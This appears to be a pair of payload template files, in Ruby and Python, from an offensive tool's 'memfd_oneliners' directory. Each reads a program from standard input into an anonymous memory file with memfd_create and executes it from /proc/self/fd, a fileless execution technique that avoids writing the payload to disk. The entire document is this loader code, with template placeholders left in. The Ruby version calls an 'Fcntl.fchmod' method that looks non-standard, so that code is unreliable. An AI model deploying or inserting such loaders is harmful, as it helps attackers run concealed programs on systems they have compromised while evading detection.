File: payloads/memfd_oneliners/memfd_payload.rb
require "fcntl"
SYS_memfd_create = __FENIX_MEMFD_SYSCALL__
fd = syscall(SYS_memfd_create, "", 1)
raise "memfd_create failed" if fd.nil? || fd <= 0
data = $stdin.read
# Keep memfd open: do not File.open(fd) { ... } (block closes fd → ENOENT on exec).
io = IO.new(fd, File::WRONLY)
io.autoclose = false if io.respond_to?(:autoclose=)
io.write(data)
io.flush
Fcntl.fchmod(fd, 0o755)
exec("/proc/self/fd/#{fd}", "__FENIX_ARGV0__")

File: payloads/memfd_oneliners/memfd_payload.py
import os
import sys

MFD_CLOEXEC = 1
fd = os.memfd_create("", MFD_CLOEXEC)
if fd < 0:
    raise OSError("memfd_create failed")
os.write(fd, sys.stdin.buffer.read())
os.execve(f"/proc/self/fd/{fd}", ["__FENIX_ARGV0__"], os.environ)
